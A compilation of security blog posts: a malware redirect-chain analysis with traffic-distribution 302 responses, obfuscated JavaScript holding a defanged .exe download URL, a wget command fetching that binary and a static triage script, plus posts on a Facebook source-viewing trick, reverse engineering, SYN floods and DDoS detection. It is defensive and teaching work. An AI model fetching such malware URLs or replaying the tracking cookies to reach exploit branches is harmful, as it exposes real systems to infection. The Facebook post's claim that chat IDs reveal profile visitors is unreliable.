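A 302 to a benign site that also sets a cookie is the behaviour of a traffic distribution script: it serves the next hop only to visitors matching its rules (referrer, User-Agent, geography) and bounces everyone else to Google, marking them with the cookie so they are not served twice. Fetching it from a lab box with wget therefore usually lands on the benign branch, which is why the headers and cookies, not just the final page, are worth keeping. The same handful of redirect and drop primitives recur across these write-ups: the location.replace plus meta-refresh fallback in Wallmart.html, the 1x1 absolutely positioned iframe above, the string variable holding an .exe URL on the landing pages, and this TDS-style 302. The following is an added example (not code from these posts) that pulls all of them out of a page saved with wget --save-headers, statically, without rendering or running anything. Both samples are constructed and use placeholder hostnames.

```python
"""List redirect and drop indicators in a page saved with `wget --save-headers`.

Added example, not code from the original posts. Everything is matched
statically; nothing is rendered or executed. Both samples are constructed
and use placeholder hostnames.
"""
import re

# Constructed sample 1: a landing page stacking the tricks seen in these
# write-ups (JS redirect + <meta refresh> fallback, 1x1 iframe, .exe in a var).
SAMPLE_PAGE = "\r\n".join([
    "HTTP/1.1 200 OK",
    "Server: nginx/0.8.54",
    "Content-Type: text/html",
    "",
    "<title>Wallmart is loading...</title>",
    '<script type="text/javascript"><!--',
    'location.replace("http://hop1.example.invalid/news/ask-index.php");//--></script>',
    "<noscript>",
    '<meta http-equiv="refresh" content="0; url=http://hop1.example.invalid/news/ask-index.php"></noscript>',
    '<iframe src="http://hop2.example.invalid/in.cgi?ftp" style="position: absolute; border: 0px; height: 1px; width: 1px;"></iframe>',
    "<script>var Owsfe;CvkiFV='RHaLS';var XXwVKa=\"http://drop.example.invalid/x/TL7vbliVHL.exe?a=m&h=32\";</script>",
    '<script src="/media/system/js/caption.js" type="text/javascript"></script>',
])

# Constructed sample 2: the TDS-style answer, a 302 to a benign site that sets
# cookies so this visitor is not served the exploit branch again.
SAMPLE_TDS = "\r\n".join([
    "HTTP/1.1 302 Found",
    "Server: Apache/2.2.15 (CentOS)",
    "Location: http://www.google.com",
    "Set-Cookie: vbpnxftp=_1_10000_; expires=Fri, 12-Apr-2013 06:08:31 GMT; path=/; domain=tds.example.invalid",
    "Set-Cookie: TSUSER=ftp; expires=Fri, 11-Apr-2014 06:08:31 GMT; path=/; domain=tds.example.invalid",
    "",
    "",
])

PATTERNS = {
    "location.replace": re.compile(r"""location\.replace\(\s*["']([^"']+)["']""", re.I),
    "location.href": re.compile(r"""location\.href\s*=\s*["']([^"']+)["']""", re.I),
    "meta-refresh": re.compile(r"""<meta[^>]+http-equiv=["']?refresh["']?[^>]*url=([^"'>\s]+)""", re.I),
    "hidden-iframe": re.compile(
        r"""<iframe[^>]+src=["']([^"']+)["'][^>]*(?:height:\s*[01]px|width:\s*[01]px|visibility:\s*hidden|display:\s*none)""",
        re.I),
    "script-src": re.compile(r"""<script[^>]+src=["']([^"']+)["']""", re.I),
    "binary-url-var": re.compile(
        r"""var\s+\w+\s*=\s*["'](https?://[^"']+\.(?:exe|jar|pdf|swf)(?:\?[^"']*)?)["']""", re.I),
}


def split_saved(saved: str):
    """Split wget --save-headers output into (status line, {header: [values]}, body)."""
    head, _, body = saved.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, body


def triage(saved: str) -> dict:
    """Return the HTTP-level and body-level redirect/drop indicators of one saved page."""
    status, headers, body = split_saved(saved)
    report = {
        "status": status,
        "location": headers.get("location", []),
        "cookies": [c.split(";", 1)[0] for c in headers.get("set-cookie", [])],
        "body": {},
    }
    for name, rx in PATTERNS.items():
        hits = rx.findall(body)
        if hits:
            report["body"][name] = hits
    return report


if __name__ == "__main__":
    for sample in (SAMPLE_PAGE, SAMPLE_TDS):
        print(triage(sample))
```

Run it over every hop you save and the chain reconstructs itself from the reported URLs; the cookies from the 302 branch are what you would replay (or deliberately omit) on the next fetch to reach the other branch.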

After this it loads 10 PHP files:

h00p://newssearch006[dot]ru/flow01.php

ranging from flow01.php to flow10.php.

 

Lets dig a little more.

Request URL:h00p://promoution115[dot]ru/tds/in.cgi?default
Request Method:GET
Status Code:302 Found

Response headers:

Connection:close
Content-Type:text/html; charset=UTF-8
Date:Thu, 11 Apr 2013 06:14:46 GMT
Location:http://www.google.com
Server:Apache/2.2.15 (CentOS)
Set-Cookie:vbpnxdefault=_10_0_20_; expires=Fri, 12-Apr-2013 06:14:46 GMT; path=/; domain=promoution115.ru
Set-Cookie:vbpnx2=_0_98_102_48_35_58_88_; expires=Fri, 12-Apr-2013 06:14:46 GMT; path=/; domain=promoution115.ru
Transfer-Encoding:chunked

 

Again redirecting.

 

After digging a little more I came across

 

“h00p://1peregon.3d-game[dot]com/pZ8UZz0BD2G0ICJF0zMwF0Uq350We0P0m89M01WMv0B0x1/pdfx.html”

and

“h00p://1peregon.3d-game[dot]com/pZ8UZz0BD2G0ICJF0zMwF0Uq350We0P0m89M01WMv0B0x1/exvft.html”

 

This asked me to allow Java; as I don't know the website I never gave permission, but it means I am on track and close to my target.

So let’s dig a little more.

 

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Encoding:gzip
Content-Length:735
Content-Type:text/html;charset=utf-8
Date:Thu, 11 Apr 2013 04:17:33 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

 

Let's take a look at its code:

<script>
ZNtS='UVne';if (ZNtS=='NYhMNY') RQvjqh();function RfTuWD(){}function omjcz(){}var PMispi=219;TbtOk='iCUcc';if (TbtOk=='xsPS') eHaPAj='PWcK';
var TgPZN='YxGr';function zuWU(){var PjSQr='LEBk';kGuff='kVcVPJ';if (kGuff=='DgDnT') jCdMP();}FOgl='mNgzp';if (FOgl=='FdLFVa') wJkyeL='nyLce';
var kdXJWSBiW="h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA";
</script>

 

Isn't this suspicious? The surrounding junk (variables that are assigned and compared against values they can never equal, empty functions) is there only to defeat signature matching; the one line that matters is the variable holding the .exe URL.

 

h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA

Let's look at the other file now (exvft.html); it ends up with:

RequestURL:h00p://1peregon.3d-game[dot]com/pZ8UZz0BD2G0ICJF0zMwF0Uq350We0P0m89M01WMv0B0x1/exvft.html
Request Method:GET
Status Code:200 OK

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Encoding:gzip
Content-Length:1701
Content-Type:text/html;charset=utf-8
Date:Thu, 11 Apr 2013 12:04:24 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

<input type="text" id="bxpkr" value="…">

 

So a text input with some random text...

Nothing much. Let's go back and analyse the file we got from the JavaScript 🙂

 


 

That script contains what we really wanted 🙂

 

“h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA”

 

The real malware, what we always wanted 🙂

wget --save-headers 'h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA'

 

Download this file and let's see its reports.

VirusTotal report:

https://www.virustotal.com/en/file/09d4986243951c6eafd4b715dd6b01a3a08e56dc61528387a914115f304b5583/analysis/1365682386/

Anubis report:

http://anubis.iseclab.org/?action=result&task_id=106d9fecea32c098409aa191b7f285fd4&format=pdf

 

So malware confirmed.

 

In the course of the analysis I came across “h00p://golf2day[dot]com/wnqe.html”, but I was not able to confirm why it is malicious, or why the browser flags it as malicious, as it was asking for an ID and password over a secure connection.

 

Anyhow, let's look at the whois for the domain:

whois 3d-game.com

  Domain Name: 3D-GAME.COM
  Registrar: DNC HOLDINGS, INC.
  Whois Server: whois.directnic.com
  Referral URL: http://www.directnic.com
  Name Server: NS1.DTDNS.COM
  Name Server: NS2.DTDNS.COM
  Name Server: NS3.DTDNS.COM
  Status: clientDeleteProhibited
  Status: clientTransferProhibited
  Status: clientUpdateProhibited
  Updated Date: 03-oct-2012
  Creation Date: 13-apr-2003
  Expiration Date: 13-apr-2014

Registrant: North Loop Networks
1807 3rd st ne
Minneapolis, MN 55418
US
612 385 5501
Domain Name: 3D-GAME.COM

Administrative Contact:
Manager, Hostmaster hostmaster@northloopnetworks.com
1807 3rd st ne
Minneapolis, MN 55418
US
612 385 5501

Technical Contact:
Manager, Hostmaster hostmaster@northloopnetworks.com
1807 3rd st ne
Minneapolis, MN 55418
US
612 385 5501

Record last updated 03-02-2011 12:39:17 PM
Record expires on 04-13-2014
Record created on 04-13-2003

Domain servers in listed order:
NS1.DTDNS.COM 64.156.29.49
NS2.DTDNS.COM 67.228.106.194
NS3.DTDNS.COM 75.126.80.224


#MalwareMustDie

Facebook Hack, Who visited your profile.


It's a simple Facebook hack, nothing like a privacy leak or anything, so I am not expecting any death threats because of this. If you are still interested in sending some, send them to my personal ID, not my official one 😉

You don't have to grant any permission or install anything; simply try this in your browser, and there is no information leak. It takes just 5 very simple steps.

1) Log in to your Facebook: I hope this is something very simple and needs no explanation.

2) View the source, or use this link "view-source:www.facebook.com": this is also simple; if not, go to your Facebook, right-click and choose View Source.

3) Search for "InitialChatFriendsList": once in the source, press Ctrl+F and search for this string.

4) Right after this keyword you will see {"list":["1111111111","2222222222",...,"9999999999"]}: a string like this, just after what you searched for, containing some random numbers.

5) Replace the Xs with one of those IDs, www.facebook.com/XXXXXXXXXX, to view that person's profile and see who visited your profile.

I hope this is pretty Simple, Post your comments.

 

Regards

Unknown_had

What is reverse engineering? (Pure theory)

This post is for those who don’t know what reverse engineering means.

I am not going to discuss anything technical such as a disassembly tool or a debugger; I will just try to tell the young audience what reversing is.

Reverse engineering, as the name says, is something like starting from the very end and finishing at the very start.

Does this sound confusing?

Let me explain with a better example: it is the process of recovering code from a binary.

There are a lot of closed-source binaries on the market, and some of them are malicious too, so we feel the need to reverse a particular binary.

Consider the example of some malware: we have no source code for it, and we need to study how it works, its internal features and what it is doing to my machine. In that case we have to cut the malware in half 😉 (kidding).

We have to reverse that malware.

There are mostly two ways we do this:

1) Dynamic analysis

2) Static analysis

Dynamic analysis is analysis of the sample with a debugger or other tools while it is executing on the system. If we are not sure about the sample, it is better to use a VM for this, as that keeps you protected and does not ruin the data on your machine.

Static analysis is simply disassembling the sample and then analysing the code without running it.

Now here comes the assembly part. As I have already taught the basics of assembly in my previous tutorial, this is going to be fun now, as it won't look like something out of The Matrix 🙂

When you attach a debugger to a running process, it cannot give you back the native source code (the original code the sample was written in); it analyses the process and dumps assembly, and for that we need to know assembly and related things.

In the next tutorials we are going to need OllyDbg; we will start with a simple, non-malicious crackme, carry on from there, and as things proceed I will try to train you from noob to pro 🙂

Ask any question in the comments or mail me.

Do tell me if you find something which is wrong.

Thanks for reading.


What is DDoS layer 7, layer 4 and low-rate DDoS

Introduction

Very recently some hacktivists known as LulzSec and Anonymous became very famous because they hacked some government websites and took the data and so on.

This got me interested in how they are doing all this. As we all know, this is now pretty old and you might already know about DDoS, but here I am telling you about DDoS layer 3 and layer 4 attacks.

The attacks carried out by the hacktivists were layer 7 attacks, and this kind of attack can be done simply by pressing the refresh button in your browser.

If hundreds of thousands of people do this, then at some point the server becomes unresponsive and stops serving users.

But for this kind of DDoS we need a great many computers; some of their owners might know that they are part of the attack, and sometimes people get involved unknowingly because they are infected with some malware.

So what are layer 3 and layer 4 DDoS?

As Anonymous got active, one person became active against them under the name “th3j35tor”, who claimed to be ex-security personnel.

It was the first time I came across this level of DDoS: he was executing it through a 3G connection on a cellphone and was taking down some 3-4 big servers using just one connection.

So what exactly is a layer 4 attack?

A layer 4 DoS attack is often referred to as a SYN flood. It works at the transport layer, i.e. TCP. A TCP connection is established in what is known as a three-way handshake. The client sends a SYN packet, the server responds with a SYN ACK, and the client responds to that with an ACK. After the “three-way handshake” is complete, the TCP connection is considered established. It is at this point that applications begin sending data using a layer 7 or application layer protocol, such as HTTP.

A SYN flood uses the inherent patience of the TCP stack to overwhelm a server by sending a flood of SYN packets and then ignoring the SYN ACKs returned by the server. This causes the server to use up resources waiting a configured amount of time for the anticipated ACK that should come from a legitimate client. Because web and application servers are limited in the number of concurrent TCP connections they can have open, if an attacker sends enough SYN packets to a server it can easily chew through the allowed number of TCP connections, thus preventing legitimate requests from being answered by the server.

SYN floods are fairly easy for proxy-based application delivery and security products to detect. Because they proxy connections for the servers, and are generally hardware-based with a much higher TCP connection limit, the proxy-based solution can handle the high volume of connections without becoming overwhelmed. Because the proxy-based solution is usually terminating the TCP connection (i.e. it is the “endpoint” of the connection) it will not pass the connection to the server until it has completed the 3-way handshake. Thus, a SYN flood is stopped at the proxy and legitimate connections are passed on to the server with alacrity.

The attackers are generally stopped from flooding the network through the use of SYN cookies. SYN cookies utilize cryptographic hashing and are therefore computationally expensive, making it desirable to let a proxy/delivery solution with hardware-accelerated cryptographic capabilities handle this type of security measure. Servers can implement SYN cookies, but the additional burden placed on the server negates much of the gain achieved by preventing SYN floods and often results in available, but unacceptably slow, servers and sites.
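To make the SYN-cookie idea concrete, here is a simplified encoder and validator added for illustration (not code from this post or from any real TCP stack): the server folds a time tick, the client's MSS and a keyed hash into its ISN, so it can verify the final ACK without keeping any half-open state. The secret, bit layout and MSS table are constructed for the demo.

```python
import hashlib
import hmac
import time

# Constructed demo secret; a real stack keeps this in kernel memory and rotates it.
SECRET = b"constructed-demo-secret-do-not-reuse"
# MSS values the client may have offered, encoded as a 3-bit table index.
MSS_TABLE = [536, 1300, 1440, 1460]
ISN_MASK = 0xFFFFFFFF


def _tick(now=None):
    """5-bit counter that advances every 64 seconds; bounds the cookie's lifetime."""
    return (int(time.time() if now is None else now) >> 6) & 0x1F


def _mac24(src_ip, src_port, dst_ip, dst_port, tick, client_isn):
    """Keyed hash over the 4-tuple, time tick and client ISN, truncated to 24 bits."""
    msg = f"{src_ip}:{src_port}>{dst_ip}:{dst_port}|{tick}|{client_isn}".encode()
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:3], "big")


def make_syn_cookie(src_ip, src_port, dst_ip, dst_port, client_isn, mss, now=None):
    """Build the server ISN for the SYN-ACK so that no half-open state is stored.

    Layout (constructed for this demo): bits 31-27 time tick, 26-24 MSS index, 23-0 MAC.
    """
    tick = _tick(now)
    mss_idx = 0
    for i, m in enumerate(MSS_TABLE):  # largest table entry not above what the client offered
        if m <= mss:
            mss_idx = i
    mac = _mac24(src_ip, src_port, dst_ip, dst_port, tick, client_isn)
    return ((tick << 27) | (mss_idx << 24) | mac) & ISN_MASK


def check_syn_cookie(src_ip, src_port, dst_ip, dst_port, seq, ack, now=None):
    """Validate the handshake's final ACK. Returns the recovered MSS, or None to drop it."""
    cookie = (ack - 1) & ISN_MASK      # the ACK acknowledges our ISN + 1
    client_isn = (seq - 1) & ISN_MASK  # the ACK's seq is the client's ISN + 1
    tick = cookie >> 27
    if (_tick(now) - tick) & 0x1F > 1:  # accept only the current tick and the previous one
        return None
    if (cookie & 0xFFFFFF) != _mac24(src_ip, src_port, dst_ip, dst_port, tick, client_isn):
        return None
    return MSS_TABLE[(cookie >> 24) & 0x7]
```

A SYN whose ACK never arrives costs the server nothing but the hash, which is the trade-off the paragraph above describes: CPU per SYN instead of a connection slot per SYN.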

LDoS (I have limited knowledge of this, which I am sharing; if you have something more then do share it with me):

Low-rate Distributed Denial-of-Service (LDDoS) attacks send fewer packets to attack legitimate flows by exploiting the vulnerability in TCP’s congestion control mechanism.

They are difficult to detect while causing severe damage to TCP-based applications. Existing approaches can only detect the presence of an LDDoS attack, but fail to identify LDDoS flows. In this paper, we propose a novel metric – Congestion Participation Rate (CPR) – and a CPR-based approach to detect and filter LDDoS attacks by their intention to congest the network. The major innovation of the CPR-based approach is its ability to identify LDDoS flows.

A flow with a CPR higher than a predefined threshold is classified as an LDDoS flow, and consequently all of its packets will be dropped. We analyze the effectiveness of CPR theoretically by quantifying the average CPR difference between normal TCP flows and LDDoS flows and showing that CPR can differentiate them. We conduct ns-2 simulations, test-bed experiments, and Internet traffic trace analysis to validate our analytical results and evaluate the performance of the proposed approach. Experimental results demonstrate that the proposed CPR-based approach is substantially more effective compared to an existing Discrete Fourier Transform (DFT)-based approach.


My project for protection against layer 7 DDoS attacks.

I have created this DDoS protection script, which is under the GPL license, and it is useful for protecting a server from layer 7 DDoS.

This is useless against any layer 3 and layer 4 DDoS attacks, and a lot of code still needs to be completed, which I will do when I get some free time. If you feel like completing it then please go ahead and ask me whatever you want.

The script can be downloaded from here; I will put it on Git ASAP.

I am sorry, as the previous link was not working I have uploaded it to GitHub, so now you can get it from here. It's under the GPL license so you can use it for free 🙂
https://github.com/unknownhad/ddos-protection
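The core of any layer 7 protection is spotting the "refresh button" pattern described above: one source sending far more requests per time window than a person browsing would. The sliding-window check below is an added illustration written for this post, not the script from the repository; the log lines are constructed samples in Apache/nginx combined format using RFC 5737 documentation addresses.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Combined access-log line: client IP, timestamp, request line, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3})')


def parse_line(line):
    """Return (ip, unix_time, path) for a combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, _method, path, _status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return ip, when.timestamp(), path


def find_flooders(lines, window=10, max_hits=5):
    """Sliding-window rate check: {ip: peak hits} for sources that sent more than
    max_hits requests within any `window`-second span. Each source's lines must be in time order."""
    recent = defaultdict(deque)
    peaks = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, t, _path = parsed
        q = recent[ip]
        q.append(t)
        while q and t - q[0] > window:  # drop hits that fell out of the window
            q.popleft()
        if len(q) > max_hits:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks


def _constructed_line(ip, second, path="/"):
    """Constructed sample log line (fixed date, documentation address space)."""
    return (f'{ip} - - [16/May/2013:14:26:{second:02d} +0000] '
            f'"GET {path} HTTP/1.1" 200 512 "-" "Mozilla/5.0"')


# Constructed sample: one client hammering refresh, two clients browsing normally.
SAMPLE_LOG = (
    [_constructed_line("203.0.113.9", s) for s in range(0, 8)]                # 8 hits in 8 s
    + [_constructed_line("198.51.100.4", s, "/about") for s in (1, 30)]       # 2 hits, 29 s apart
    + [_constructed_line("198.51.100.7", s) for s in (3, 5, 9, 13, 17, 21)]   # never more than 4 in 10 s
)
```

The threshold and window are the knobs: too tight and a page with many sub-resources trips it, too loose and a slow flood slips through, so tune them against your own normal traffic before dropping anything.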

Hope you like this and do share your views.
